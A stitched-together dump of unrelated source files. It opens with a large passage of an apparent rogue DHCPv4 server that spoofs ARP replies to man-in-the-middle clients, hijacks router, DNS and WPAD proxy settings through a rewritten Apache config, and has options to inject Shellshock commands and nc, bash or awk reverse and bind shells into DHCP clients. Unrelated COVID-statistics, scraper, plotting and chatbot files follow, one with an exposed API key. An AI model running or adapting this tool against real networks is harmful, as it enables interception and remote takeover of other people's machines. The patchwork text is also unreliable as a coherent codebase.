# endregion
# region Get client requested ip
try:
requested_ip = clients[arp_sender_mac_address]['requested_ip']
except KeyError:
requested_ip = ''
# endregion
# region Create IPv4 address conflict
if mitm_status.startswith('error'):
arp_reply = arp.make_response(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=arp_sender_mac_address,
sender_mac=your_mac_address, sender_ip=arp_target_ip_address,
target_mac=arp_sender_mac_address, target_ip=arp_sender_ip_address)
raw_socket.send(arp_reply)
base.print_info('ARP response to: ', arp_sender_mac_address,
' \'', arp_target_ip_address + ' is at ' + your_mac_address,
'\' (IPv4 address conflict)')
# endregion
# region MITM success
if mitm_status.startswith('success'):
if arp_target_ip_address == requested_ip:
clients[arp_sender_mac_address].update({'client request his ip': True})
if arp_target_ip_address == router_ip_address:
clients[arp_sender_mac_address].update({'client request router ip': True})
if arp_target_ip_address == dns_server_ip_address:
clients[arp_sender_mac_address].update({'client request dns ip': True})
try:
test = clients[arp_sender_mac_address]['client request his ip']
test = clients[arp_sender_mac_address]['client request router ip']
test = clients[arp_sender_mac_address]['client request dns ip']
try:
test = clients[arp_sender_mac_address]['success message']
except KeyError:
if args.exit:
sleep(3)
base.print_success('MITM success: ', requested_ip + ' (' + arp_sender_mac_address + ')')
exit(0)
else:
base.print_success('MITM success: ', requested_ip + ' (' + arp_sender_mac_address + ')')
clients[arp_sender_mac_address].update({'success message': True})
except KeyError:
pass
# endregion
# endregion
# endregion
# region Main function
if __name__ == '__main__':
# region import Raw-packet classes
path.append(dirname(dirname(dirname(abspath(__file__)))))
utils_path = dirname(dirname(dirname(abspath(__file__)))) + '/raw_packet/Utils/'
from raw_packet.Utils.base import Base
from raw_packet.Utils.network import RawEthernet, RawARP, RawIPv4, RawUDP, RawDHCPv4
from raw_packet.Utils.tm import ThreadManager
from raw_packet.Scanners.scanner import Scanner
# endregion
# region Init Raw-packet classes
base: Base = Base()
scanner: Scanner = Scanner()
eth: RawEthernet = RawEthernet()
arp: RawARP = RawARP()
ip: RawIPv4 = RawIPv4()
udp: RawUDP = RawUDP()
dhcp: RawDHCPv4 = RawDHCPv4()
# endregion
try:
# region Check user, platform and create threads
base.check_user()
base.check_platform()
tm = ThreadManager(3)
# endregion
# region Parse script arguments
parser = ArgumentParser(description='Rogue DHCPv4 server')
parser.add_argument('-i', '--interface', help='Set interface name for send reply packets')
parser.add_argument('-f', '--first_offer_ip', type=str, help='Set first client ip for offering', default=None)
parser.add_argument('-l', '--last_offer_ip', type=str, help='Set last client ip for offering', default=None)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
parser.add_argument('-T', '--target_ip', type=str, help='Set client IP address with MAC in --target_mac',
default=None)
parser.add_argument('-m', '--netmask', type=str, help='Set network mask', default=None)
parser.add_argument('--dhcp_mac', type=str, help='Set DHCP server MAC address, if not set use your MAC address',
default=None)
parser.add_argument('--dhcp_ip', type=str, help='Set DHCP server IP address, if not set use your IP address',
default=None)
parser.add_argument('--router', type=str, help='Set router IP address, if not set use your ip address',
default=None)
parser.add_argument('--dns', type=str, help='Set DNS server IP address, if not set use your ip address',
default=None)
parser.add_argument('--tftp', type=str, help='Set TFTP server IP address', default=None)
parser.add_argument('--wins', type=str, help='Set WINS server IP address', default=None)
parser.add_argument('--proxy', type=str, help='Set Proxy URL, example: 192.168.0.1:8080', default=None)
parser.add_argument('--domain', type=str, help='Set domain name for search, default=local', default='local')
parser.add_argument('--lease_time', type=int, help='Set lease time, default=172800', default=172800)
parser.add_argument('-s', '--send_discover', action='store_true',
help='Send DHCP discover packets in the background thread')
parser.add_argument('-r', '--discover_rand_mac', action='store_true',
help='Use random MAC address for source MAC address in DHCP discover packets')
parser.add_argument('-d', '--discover_delay', type=float,
help='Set delay between DHCP discover packets (default=0.5 sec.)', default=0.5)
parser.add_argument('-O', '--shellshock_option_code', type=int,
help='Set dhcp option code for inject shellshock payload, default=114', default=114)
parser.add_argument('-c', '--shellshock_command', type=str, help='Set shellshock command in DHCP client')
parser.add_argument('-b', '--bind_shell', action='store_true', help='Use awk bind tcp shell in DHCP client')
parser.add_argument('-p', '--bind_port', type=int, help='Set port for listen bind shell (default=1234)',
default=1234)
parser.add_argument('-N', '--nc_reverse_shell', action='store_true',
help='Use nc reverse tcp shell in DHCP client')
parser.add_argument('-E', '--nce_reverse_shell', action='store_true',
help='Use nc -e reverse tcp shell in DHCP client')
parser.add_argument('-R', '--bash_reverse_shell', action='store_true',
help='Use bash reverse tcp shell in DHCP client')
parser.add_argument('-e', '--reverse_port', type=int, help='Set port for listen bind shell (default=443)',
default=443)
parser.add_argument('-n', '--without_network', action='store_true', help='Do not add network configure in payload')
parser.add_argument('-B', '--without_base64', action='store_true', help='Do not use base64 encode in payload')
parser.add_argument('--ip_path', type=str,
help='Set path to "ip" in shellshock payload, default = /bin/', default='/bin/')
parser.add_argument('--iface_name', type=str,
help='Set iface name in shellshock payload, default = eth0', default='eth0')
parser.add_argument('--broadcast_response', action='store_true', help='Send broadcast response')
parser.add_argument('--dnsop', action='store_true', help='Do not send DHCP OFFER packets')
parser.add_argument('--exit', action='store_true', help='Exit on success MiTM attack')
parser.add_argument('--apple', action='store_true', help='Add delay before send DHCP ACK')
parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output')
args = parser.parse_args()
# endregion
# region Print banner if argument quit is not set
if not args.quiet:
base.print_banner()
# endregion
# region Set variables
target_mac_address: Union[None, str] = None
target_ip_address: Union[None, str] = None
first_offer_ip_address: Union[None, str] = None
last_offer_ip_address: Union[None, str] = None
dhcp_discover_packets_source_mac: Union[None, str] = None
free_ip_addresses: List[str] = list()
clients: Dict[str, Union[str, Dict[str, Union[bool, str]]]] = dict()
discover_sender_is_work: bool = False
wpad_url: Union[None, str] = None
# endregion
# region Get your network settings
if args.interface is None:
base.print_warning('Please set a network interface for sniffing ARP and DHCP requests ...')
current_network_interface: str = base.network_interface_selection(args.interface)
your_mac_address: str = base.get_interface_mac_address(current_network_interface)
your_ip_address: str = base.get_interface_ip_address(current_network_interface)
your_network_mask: str = base.get_interface_netmask(current_network_interface)
if args.netmask is None:
network_mask: str = your_network_mask
else:
network_mask: str = args.netmask
# endregion
# region Create raw socket
raw_socket: socket = socket(AF_PACKET, SOCK_RAW)
raw_socket.bind((current_network_interface, 0))
# endregion
# region Get first and last IP address in your network
first_ip_address: str = base.get_first_ip_on_interface(current_network_interface)
last_ip_address: str = base.get_last_ip_on_interface(current_network_interface)
first_offer_ip_address: str = base.get_second_ip_on_interface(current_network_interface)
last_offer_ip_address: str = base.get_penultimate_ip_on_interface(current_network_interface)
# endregion
# region Set target MAC and IP address, if target IP is not set - get first and last offer IP
if args.target_mac is not None:
assert base.mac_address_validation(args.target_mac), \
'Bad target MAC address `-t, --target_mac`: ' + base.error_text(args.target_mac) + \
'; example MAC address: ' + base.info_text('12:34:56:78:90:ab')
target_mac_address = str(args.target_mac).lower()
# region Target IP is set
if args.target_ip is not None:
assert target_mac_address is not None, \
'Please set target MAC address (example: --target_mac 00:AA:BB:CC:DD:FF)' + \
', for target IP address: ' + base.info_text(args.target_ip)
assert base.ip_address_in_range(args.target_ip, first_ip_address, last_ip_address), \
'Bad target IP address `-T, --target_ip`: ' + base.error_text(args.target_ip) + \
'; target IP address must be in range: ' + base.info_text(first_ip_address + ' - ' + last_ip_address)
target_ip_address = args.target_ip
# endregion
# region Target IP is not set - get first and last offer IP
else:
# Check first offer IP address
if args.first_offer_ip is not None:
assert base.ip_address_in_range(args.first_offer_ip, first_ip_address, last_ip_address), \
'Bad value `-f, --first_offer_ip`: ' + base.error_text(args.first_offer_ip) + \
'; first IP address in your network: ' + base.info_text(first_ip_address)
first_offer_ip_address = args.first_offer_ip
# Check last offer IP address
if args.last_offer_ip is not None:
assert base.ip_address_in_range(args.last_offer_ip, first_ip_address, last_ip_address), \
'Bad value `-l, --last_offer_ip`: ' + base.error_text(args.last_offer_ip) + \
'; last IP address in your network: ' + base.info_text(last_ip_address)
last_offer_ip_address = args.last_offer_ip
# endregion
# endregion
# region Set DHCP sever MAC and IP address
if args.dhcp_mac is None:
dhcp_server_mac_address: str = your_mac_address
else:
assert base.mac_address_validation(args.dhcp_mac), \
'Bad DHCP server MAC address `--dhcp_mac`: ' + base.error_text(args.dhcp_mac) + \
'; example MAC address: ' + base.info_text('12:34:56:78:90:ab')
dhcp_server_mac_address: str = args.dhcp_mac
if args.dhcp_ip is None:
dhcp_server_ip_address: str = your_ip_address
else:
assert base.ip_address_in_range(args.dhcp_ip, first_ip_address, last_ip_address), \
'Bad DHCP server IP address `--dhcp_ip`: ' + base.error_text(args.dhcp_ip) + \
'; DHCP server IP address must be in range: ' + \
base.info_text(first_ip_address + ' - ' + last_ip_address)
dhcp_server_ip_address: str = args.dhcp_ip
# endregion
# region Set router, dns, tftp, wins IP address
# region Set router IP address
if args.router is None:
router_ip_address: str = your_ip_address
else:
assert base.ip_address_in_range(args.router, first_ip_address, last_ip_address), \
'Bad Router IP address `--router`: ' + base.error_text(args.router) + \
'; Router IP address must be in range: ' + base.info_text(first_ip_address + ' - ' + last_ip_address)
router_ip_address: str = args.router
# endregion
# region Set DNS server IP address
if args.dns is None:
dns_server_ip_address: str = your_ip_address
else:
assert base.ip_address_validation(args.dns), \
'Bad DNS server IP address in `--dns` parameter: ' + base.info_text(args.dns)
dns_server_ip_address: str = args.dns
# endregion
# region Set TFTP server IP address
if args.tftp is None:
tftp_server_ip_address: str = your_ip_address
else:
assert base.ip_address_validation(args.tftp), \
'Bad TFTP server IP address in `--tftp` parameter: ' + base.info_text(args.tftp)
tftp_server_ip_address: str = args.tftp
# endregion
# region Set WINS server IP address
if args.wins is None:
wins_server_ip_address: str = your_ip_address
else:
assert base.ip_address_in_range(args.wins, first_ip_address, last_ip_address), \
'Bad value `--wins`: ' + base.error_text(args.wins) + \
'; WINS server IP address must be in range: ' + \
base.info_text(first_ip_address + ' - ' + last_ip_address)
wins_server_ip_address: str = args.wins
# endregion
# endregion
# region Set proxy
if args.proxy is not None:
# Set variables
wpad_url = 'http://' + your_ip_address + '/wpad.dat'
apache2_sites_available_dir = '/etc/apache2/sites-available/'
apache2_sites_path = '/var/www/html/'
wpad_path = apache2_sites_path + 'wpad/'
# Apache2 sites settings
default_site_file_name = '000-default.conf'
default_site_file = open(apache2_sites_available_dir + default_site_file_name, 'w')
default_site_file.write('<VirtualHost *:80>\n' +
'\tServerAdmin [email protected]\n' +
'\tDocumentRoot ' + wpad_path + '\n' +
'\t<Directory ' + wpad_path + '>\n' +
'\t\tOptions FollowSymLinks\n' +
'\t\tAllowOverride None\n' +
'\t\tOrder allow,deny\n' +
'\t\tAllow from all\n' +
'\t</Directory>\n' +
'</VirtualHost>\n')
default_site_file.close()
# Create dir with wpad.dat script
try:
makedirs(wpad_path)
except OSError:
base.print_info('Path: ', wpad_path, ' already exist')
# Copy wpad.dat script
wpad_script_name = 'wpad.dat'
wpad_script_src = utils_path + wpad_script_name
wpad_script_dst = wpad_path + wpad_script_name
copyfile(src=wpad_script_src, dst=wpad_script_dst)
# Read redirect script
with open(wpad_script_dst, 'r') as redirect_script:
content = redirect_script.read()
# Replace the Proxy URL
content = content.replace('proxy_url', args.proxy)
# Write redirect script
with open(wpad_script_dst, 'w') as redirect_script:
redirect_script.write(content)
# Restart Apache2 server
try:
base.print_info('Restarting apache2 server ...')
sub.Popen(['service apache2 restart >/dev/null 2>&1'], shell=True)
except OSError as e:
base.print_error('Something went wrong while trying to run ', '`service apache2 restart`')
exit(1)
# Check apache2 is running
sleep(2)
apache2_pid = base.get_process_pid('apache2')
if apache2_pid == -1:
base.print_error('Apache2 server is not running!')
exit(1)
else:
base.print_info('Apache2 server is running, PID: ', str(apache2_pid))
# endregion
# region Set Shellshock option code
if 255 < args.shellshock_option_code < 0:
base.print_error('Bad value: ', args.shellshock_option_code,
'in DHCP option code! This value should be in the range from 1 to 254')
exit(1)
# endregion
# region Set search domain
domain: bytes = args.domain.encode('utf-8')
# endregion
# region General output
if not args.quiet:
base.print_info('Network interface: ', current_network_interface)
base.print_info('Your IP address: ', your_ip_address)
base.print_info('Your MAC address: ', your_mac_address)
if target_mac_address is not None:
base.print_info('Target MAC: ', target_mac_address)
# If target IP address is set print target IP, else print first and last offer IP
if target_ip_address is not None:
base.print_info('Target IP: ', target_ip_address)
else:
base.print_info('First offer IP: ', first_offer_ip_address)
base.print_info('Last offer IP: ', last_offer_ip_address)
base.print_info('DHCP server mac address: ', dhcp_server_mac_address)
base.print_info('DHCP server ip address: ', dhcp_server_ip_address)
base.print_info('Router IP address: ', router_ip_address)
base.print_info('DNS server IP address: ', dns_server_ip_address)
base.print_info('TFTP server IP address: ', tftp_server_ip_address)
if args.proxy is not None:
base.print_info('Proxy url: ', args.proxy)
# endregion
# region Add ip addresses in list with free ip addresses from first to last offer IP
if target_ip_address is None:
base.print_info('Create list with free IP addresses in your network ...')
get_free_ip_addresses()
# endregion
# region Send DHCP discover packets in the background thread
if args.send_discover:
base.print_info('Start DHCP discover packets send in the background thread ...')
if args.discover_rand_mac:
dhcp_discover_packets_source_mac = eth.make_random_mac()
base.print_info('DHCP discover packets Ethernet source MAC: ', dhcp_discover_packets_source_mac,
' (random MAC address)')
else:
dhcp_discover_packets_source_mac = your_mac_address
base.print_info('DHCP discover packets Ethernet source MAC: ', dhcp_discover_packets_source_mac,
' (your MAC address)')
base.print_info('Delay between DHCP discover packets: ', str(args.discover_delay))
discover_sender_is_work = True
tm.add_task(discover_sender)
# endregion
# region Sniff network
# region Create RAW socket for sniffing
listen_raw_socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
# endregion
# region Print info message
base.print_info('Waiting for a ARP or DHCP requests ...')
# endregion
# region Start sniffing
while True:
# region Try
try:
# region Sniff packets from RAW socket
packets = listen_raw_socket.recvfrom(2048)
for packet in packets:
# region Parse Ethernet header
ethernet_header = packet[0:eth.header_length]
ethernet_header_dict = eth.parse_header(ethernet_header)
# endregion
# region Could not parse Ethernet header - break
if ethernet_header_dict is None:
break
# endregion
# region Ethernet filter
if target_mac_address is not None:
if ethernet_header_dict['source'] != target_mac_address:
break
else:
if ethernet_header_dict['source'] == your_mac_address:
break
if dhcp_discover_packets_source_mac is not None:
if ethernet_header_dict['source'] == dhcp_discover_packets_source_mac:
break
# endregion
# region ARP packet
# 2054 - Type of ARP packet (0x0806)
if ethernet_header_dict['type'] == arp.packet_type:
# region Parse ARP packet
arp_header = packet[eth.header_length:eth.header_length + arp.packet_length]
arp_packet_dict = arp.parse_packet(arp_header)
# endregion
# region Could not parse ARP packet - break
if arp_packet_dict is None:
break
# endregion
# region ARP filter
if arp_packet_dict['opcode'] != 1:
break
# endregion
# region Call function with full ARP packet
reply({
'Ethernet': ethernet_header_dict,
'ARP': arp_packet_dict
})
# endregion
# endregion
# region IP packet
# 2048 - Type of IP packet (0x0800)
if ethernet_header_dict['type'] == ip.header_type:
# region Parse IP header
ip_header = packet[eth.header_length:]
ip_header_dict = ip.parse_header(ip_header)
# endregion
# region Could not parse IP header - break
if ip_header_dict is None:
break
# endregion
# region UDP
if ip_header_dict['protocol'] == udp.header_type:
# region Parse UDP header
udp_header_offset = eth.header_length + (ip_header_dict['length'] * 4)
udp_header = packet[udp_header_offset:udp_header_offset + udp.header_length]
udp_header_dict = udp.parse_header(udp_header)
# endregion
# region Could not parse UDP header - break
if udp_header is None:
break
# endregion
# region DHCP packet
if udp_header_dict['destination-port'] == 67 and udp_header_dict['source-port'] == 68:
# region Parse DHCP packet
dhcp_packet_offset = udp_header_offset + udp.header_length
dhcp_packet = packet[dhcp_packet_offset:]
dhcp_packet_dict = dhcp.parse_packet(dhcp_packet)
# endregion
# region Could not parse DHCP packet - break
if dhcp_packet_dict is None:
break
# endregion
# region Call function with full DHCP packet
full_dhcp_packet = {
'Ethernet': ethernet_header_dict,
'IP': ip_header_dict,
'UDP': udp_header_dict
}
full_dhcp_packet.update(dhcp_packet_dict)
reply(full_dhcp_packet)
# endregion
# endregion
# endregion
# endregion
# endregion
# endregion
# region Exception - KeyboardInterrupt
except KeyboardInterrupt:
base.print_info('Exit')
exit(0)
# endregion
# endregion
# endregion
except KeyboardInterrupt:
base.print_info('Exit')
exit(0)
except AssertionError as Error:
base.print_error(Error.args[0])
exit(1)
# endregion
``` |
{
"source": "4eks1s/BOT-Toby",
"score": 3
} |
#### File: 4eks1s/BOT-Toby/upgrader.py
```python
import os
import git
from threading import Thread
from time import sleep
os.environ["BOT_UPGRADE"] = "no"
def threaded_function():
while(True):
if os.getenv("BOT_UPGRADE") == "yes":
repo = git.Repo(os.getcwd())
o = repo.remotes.origin
o.pull()
sleep(1)
def start():
exec(open('bot.py').read())
start()
thread = Thread(target = threaded_function)
thread.start()
start()
``` |
{
"source": "4elovek37/diseases_risk_analysing",
"score": 2
} |
#### File: analyzer/disease_models/covid_19_model.py
```python
from .disease_model import DiseaseModel
from analyzer.models import Disease, DiseaseSeason
class Covid19Model(DiseaseModel):
def __init__(self):
super(Covid19Model, self).__init__()
self.disease = Disease.objects.get(icd_10_code='U07.1')
self.season = DiseaseSeason.objects.get(disease=self.disease,
start_date='2019-11-17')
def _get_season(self):
return self.season
def _get_carrier_window(self):
return 5
def _get_carrier_multiplier(self):
return 1.25
def _get_sar_estimation(self):
return self.disease.sar_estimation
def _get_disease(self):
return self.disease
```
#### File: management/commands/update_covid_19_stats.py
```python
from django.core.management.base import BaseCommand, CommandError
from analyzer.models import Country, Disease, DiseaseSeason, DiseaseStats
import wget
import os
import json
import gzip
import shutil
from datetime import date
class CountryDailyStats:
def __init__(self, date_iso):
self.date = date.fromisoformat(date_iso)
self.confirmed = 0
self.deaths = 0
self.recovered = None
class CountryStatsFromJson:
def __init__(self,):
self.countries_dict = dict()
class Command(BaseCommand):
help = 'Initiates updating of covid_19 stats in Disease_stats table'
#https://github.com/cipriancraciun/covid19-datasets
def __init__(self):
BaseCommand.__init__(self)
#'https://raw.githubusercontent.com/cipriancraciun/covid19-datasets/master/exports/jhu/v1/values.json'
self.url = 'https://github.com/cipriancraciun/covid19-datasets/raw/master/exports/jhu/v1/daily/values.json.gz'
self.zip_path = './analyzer/management/commands/update_covid_19_stats/dataset.gz'
self.json_path = './analyzer/management/commands/update_covid_19_stats/dataset.json'
def handle(self, *args, **options):
try:
directory = os.path.dirname(self.json_path)
if not os.path.exists(directory):
os.makedirs(directory)
wget.download(self.url, self.zip_path)
with gzip.open(self.zip_path, 'rb') as f_in:
with open(self.json_path, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
stats_from_json = self.process_json(self.json_path)
self.stdout.write(self.update_db(stats_from_json))
except:
self.clear_temp_data()
raise
self.clear_temp_data()
return self.style.SUCCESS('update_covid_19_stats finished OK')
@staticmethod
def process_json(json_file_path):
stats_from_json = CountryStatsFromJson()
with open(json_file_path, "r") as read_file:
data = json.load(read_file)
for ds_row in data:
if ds_row['location']['type'] == 'total-country' and 'absolute' in ds_row['values']:
country_code = ds_row['location']['country_code']
if country_code not in stats_from_json.countries_dict:
stats_from_json.countries_dict[country_code] = list()
daily_stats = CountryDailyStats(ds_row['date']['date'])
daily_stats.confirmed = ds_row['values']['absolute']['confirmed']
if 'deaths' in ds_row['values']['absolute']:
daily_stats.deaths = ds_row['values']['absolute']['deaths']
if 'recovered' in ds_row['values']['absolute']:
daily_stats.recovered = ds_row['values']['absolute']['recovered']
stats_from_json.countries_dict[country_code].append(daily_stats)
return stats_from_json
@staticmethod
def update_db(stats):
inserted = 0
updated = 0
season = DiseaseSeason.objects.get(disease=Disease.objects.get(icd_10_code='U07.1'), start_date='2019-11-17')
countries = Country.objects.all()
for country in countries:
country_stats = stats.countries_dict.get(country.iso_a_2_code)
if country_stats is None:
continue
for daily_stats in country_stats:
obj, created = DiseaseStats.objects.update_or_create(disease_season=season,
country=country,
stats_date=daily_stats.date,
defaults={'recovered': daily_stats.recovered,
'confirmed': daily_stats.confirmed,
'deaths': daily_stats.deaths})
if created:
inserted += 1
else:
updated += 1
return 'update_covid_19_stats: inserted = %i, updated = %i' % (inserted, updated)
def clear_temp_data(self):
if os.path.exists(self.json_path):
os.remove(self.json_path)
if os.path.exists(self.zip_path):
os.remove(self.zip_path)
```
#### File: diseases_risk_analysing/analyzer/views_misc.py
```python
class CountryActualState:
def __init__(self, country_name, date):
self.country_name = country_name
self.CFR = None
self.confirmed = 0
self.deaths = 0
self.recovered = None
#self.growth_gradient = list()
self.avg_growth = 0
self.date = date
class CountriesWorldTop:
def __init__(self):
self.cfr_top = list()
self.growth_top = list()
self.confirmed_top = list()
class DailyStat:
def __init__(self, date, val):
self.date = date
self.val = val
```
#### File: 4elovek37/diseases_risk_analysing/updates_scheduler.py
```python
from subprocess import call
from apscheduler.schedulers.blocking import BlockingScheduler
sched = BlockingScheduler()
@sched.scheduled_job('cron', hour=6, minute=30)
def scheduled_job():
print('Calling handle_tasks...')
call(['python', './manage.py', 'handle_tasks'])
print('Calling handle_tasks done')
sched.start()
``` |
{
"source": "4enzo/learning_py",
"score": 3
} |
#### File: 4enzo/learning_py/my_decorator.py
```python
import time
import functools
def run_time(func):
"函数运行时长"
@functools.wraps(func)
def inner(*args, **kwargs):
start_time = time.time()
result = func(*args, **kwargs)
end_time = time.time()
print('%s spend: %.4f s'%(func.__name__,end_time-start_time))
return result
return inner
#@property
class Test(object):
def __init__(self):
self.__num = 100
#@property可以把一个方法装饰成一个属性来使用
#正常情况下,操作私有变量需要使用set get函数,但这显得繁琐
# 把一个getter方法变成属性,只需要加上@property就可以了,此时,@property本身又创建了另一个装饰器@xxx.setter,负责把一个setter方法变成属性赋值,于是,我们就拥有一个可控的属性操作
@property
def num(self):
return self.__num
@num.setter
def num(self,number):
if isinstance(number,int):
self.__num = number
else:
print('The number is not a int')
class Foo(object):
name = 'test'
def __init__(self):
pass
#通常情况下,类中定义的方法默认都是实例方法
#self实例方法的调用离不开实例,需要把实例自己传给函数
def normal_func(self):
"实例方法"
print('This is normal_func')
#实例方法调用静态方法使用self.方法名()
self.static_func()
#@staticmethod不需要表示自身对象的self和自身类的cls参数,就跟使用函数一样
#如果方法内部没有操作实例属性的操作,仅仅包含一些工具性的操作,建议使用静态方法,比如格式化时间输出
@staticmethod
def static_func():
"静态方法"
print('This is static_func')
#@classmethod 修饰符对应的函数不需要实例化,不需要 self 参数,但第一个参数需要是表示自身类的 cls 参数,可以来调用类的属性,类的方法,实例化对象等,避免硬编码
#如果需要对类属性,即静态变量进行限制性操作,则建议使用类方法
@classmethod
def class_func(cls):
"类方法"
print('This is class_func')
if __name__ == '__main__':
#实例方法需要实例,只能:类名().方法名()调用
Foo().normal_func()
#类名.方法名()
#也可以类名().方法名(),但不建议
Foo.static_func()
#类名.方法名()
#也可以类名().方法名(),但不建议
Foo.class_func()
``` |
{
"source": "4enzo/spider",
"score": 3
} |
#### File: 4enzo/spider/lianjia_tj.py
```python
import random
import time
import requests
import bs4
import pymongo
# 链家官网爬取天津二手房信息
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36"
}
def get_request(url):
request = requests.get(url,headers=headers)
if request.status_code == 200:
return request
else:
print(url + "error:"+request.status_code)
return None
def get_total_page():
#目前看官网是固定100页,pg100+会跳转到首页,所以total_page直接写死100???
# request = get_request(url)
# soup = bs4.BeautifulSoup(request.text,'html.parser')
# total_page = soup.find_all('dev',class_='page-box house-lst-page-box') #未实现,未完待续。。。
# print(total_page)
total_page = 100
return total_page
def get_pages_url():
#生成所有page的URL:https://tj.lianjia.com/ershoufang/pg2/
pages_url = []
for i in range(1,int(get_total_page())+1):
page_url = 'https://tj.lianjia.com/ershoufang/pg'+str(i)
pages_url.append(page_url)
return pages_url
def get_house_url(url_list):
#获取page下所有house的title和url
#只获取url 2019-04-01
house_url_list = []
for url in url_list:
request = get_request(url)
soup = bs4.BeautifulSoup(request.text, 'html.parser')
# house = []
curr_page_house_count = len(soup.find_all('li',class_="clear LOGCLICKDATA"))
for i in range(0,curr_page_house_count):
house_title = soup.find_all('li',class_="clear LOGCLICKDATA")[i].find('div',class_="title").find('a').string
house_url = soup.find_all('li',class_="clear LOGCLICKDATA")[i].find('div',class_="title").find('a',class_="").get('href')
# house.append('{%s,%s}'%(house_title,house_url))
get_house_info(house_url)
# house_url_list.append(house_url)
# return house_url_list
def get_house_info(url):
house_info = {}
request = get_request(url)
soup = bs4.BeautifulSoup(request.text,'html.parser')
basic = soup.find('div',class_='newwrap baseinform').find_all('li')
#获取全部信息,方便后期分析
house_info['房屋户型'] = basic[0].text[4:]
house_info['所在楼层'] = basic[1].text[4:]
house_info['建筑面积'] = basic[2].text[4:]
house_info['户型结构'] = basic[3].text[4:]
house_info['套内面积'] = basic[4].text[4:]
house_info['建筑类型'] = basic[5].text[4:]
house_info['房屋朝向'] = basic[6].text[4:]
house_info['建筑结构'] = basic[7].text[4:]
house_info['装修情况'] = basic[8].text[4:]
house_info['梯户比例'] = basic[9].text[4:]
house_info['供暖方式'] = basic[10].text[4:]
house_info['配备电梯'] = basic[11].text[4:]
house_info['产权年限'] = basic[12].text[4:]
house_info['挂牌时间'] = basic[13].find_all('span')[1].text
house_info['交易权属'] = basic[14].find_all('span')[1].text
house_info['上次交易'] = basic[15].find_all('span')[1].text
house_info['房屋用途'] = basic[16].find_all('span')[1].text
house_info['房屋年限'] = basic[17].find_all('span')[1].text
house_info['产权所属'] = basic[18].find_all('span')[1].text
house_info['抵押信息'] = basic[19].find_all('span')[1].text.strip()
house_info['房本备件'] = basic[20].find_all('span')[1].text
with open('./lianjia_tj.txt','a') as f:
f.write(str(house_info)+'\n')
write2db(house_info)
def write2db(info):
#写入mongodb数据库
conn = pymongo.MongoClient('192.168.199.170', 27017)
db = conn.spider
my_collection = db.lianjia_tj
my_collection.insert(info)
def main():
page_url = get_pages_url()
get_house_url(page_url)
# for url in house_url_list:
# time.sleep(random.randint(1,10))
# get_house_info(url)
if __name__ == '__main__':
main()
``` |
{
"source": "4enzo/tuling_robot",
"score": 3
} |
#### File: 4enzo/tuling_robot/tuling.py
```python
import requests
import json
import logging
logging.basicConfig(level=logging.DEBUG,
filename='./log.txt',
filemode='a',
format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')
# 直接调用接口与图灵机器人对话
def get_answer(info):
api_url = 'http://openapi.tuling123.com/openapi/api/v2'
# 图灵机器人api 参考https://www.kancloud.cn/turing/web_api/522992
# 目前脚本只支持文本即reqType=0
# apikey 通过官网注册创建机器人获取,userId任意填写即可
data = {
'reqType': 0,
'perception': {'inputText':{'text':info}},
'userInfo': {
'apiKey': '6997c5b25a2549cab428708d61d8514e',
'userId': 'python'
}
}
r = requests.post(api_url, data=json.dumps(data))
s = json.loads(r.text)
reply_code = s['intent']['code']
if reply_code == 10003:
'''code = 10003 新闻类标识码'''
news = s['results'][1]['values']['news']
news_str = s['results'][0]['values']['text'] + ':\n'
for list in news:
# print(list)
news_str = news_str + list['name'] +'\n来源:' + list['info'] +'\n链接:' + list['detailurl'] + '\n\n'
return news_str
elif reply_code == 10014:
'''code = 10014 链接类标识码'''
pic = s['results'][1]['values']['text'] + '\n' + s['results'][0]['values']['url']
return pic
elif reply_code == 10015:
'''code = 10015 菜谱类标识码'''
cook = s['results'][1]['values']['news']
cook_str = s['results'][0]['values']['text'] + ':\n'
for list in cook:
cook_str = cook_str + list['name'] +'\n' + list['info'] +'\n链接:' + list['detailurl'] + '\n\n'
return cook_str
else:
'''很多code值的处理结果都可以用如下方法,暂时这样用着?'''
answer = s['results'][0]['values']['text']
#其他reply_code先记录到日志后,以后更新
logging.debug(u'问题:%s\t----%s\n返回数据:%s'%(info,reply_code,s))
return answer
if __name__ == '__main__':
while True:
que = input("我:")
print('图灵机器人:' + get_answer(que))
``` |
{
"source": "4epel-coder/4epelprojekt",
"score": 3
} |
#### File: 4epelprojekt/plots/plots.py
```python
import numpy as np
import matplotlib.pyplot as plt
def plot_train_val(m_train, m_val, period=25, al_param=False, metric='IoU'):
"""Plot the evolution of the metric evaluated on the training and validation set during the trainining
Args:
m_train: history of the metric evaluated on the train
m_val: history of the metric evaluated on the val
period: number of epochs between 2 valutation of the train
al_param: number of epochs for each learning rate
metric: metric used (e.g. Loss, IoU, Accuracy)
Returns:
plot
"""
plt.title('Evolution of the '+metric+ ' with respect to the number of epochs',fontsize=14)
if al_param:
al_steps = np.array( range( 1, int(len(m_train)*period/al_param )+1 ) ) *al_param
for al_step in al_steps:
plt.axvline(al_step, color='black')
plt.plot(np.array(range(0,len(m_train)))*period, m_train, color='blue', marker='o', ls=':', label=metric+' train')
plt.plot(np.array(range(0,len(m_val)))*period, m_val, color='red', marker='o', ls=':', label=metric+' val')
plt.xlabel('Number of Epochs')
plt.ylabel(metric)
plt.legend(loc = 'upper right')
plt.savefig('evol_'+metric)
plt.show()
``` |
{
"source": "4ESoftware/TempRent",
"score": 3
} |
#### File: TempRent/reporting/rep_utils.py
```python
import pandas as pd
from libraries import Logger
from libraries import LummetryObject
import mysql.connector as mysql
from time import time
import matplotlib.pyplot as plt
import seaborn as sns
import os
from datetime import datetime
class RepEngine(LummetryObject):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.SERVER = self.config_data['SERVER']
self.PORT = self.config_data['PORT']
self.USER = self.config_data['USER']
self.PASS = self.config_data['PASS']
self.DB = self.config_data['DB']
self._rep_base = '_get_report_'
try:
self.connect()
except:
self.P("WARNING! Couldn't connect to the mysql DB!")
return
def connect(self):
self.db = mysql.connect(
host=self.SERVER,
port=int(self.PORT),
user=self.USER,
passwd=<PASSWORD>,
database=self.DB
)
cursor = self.db.cursor()
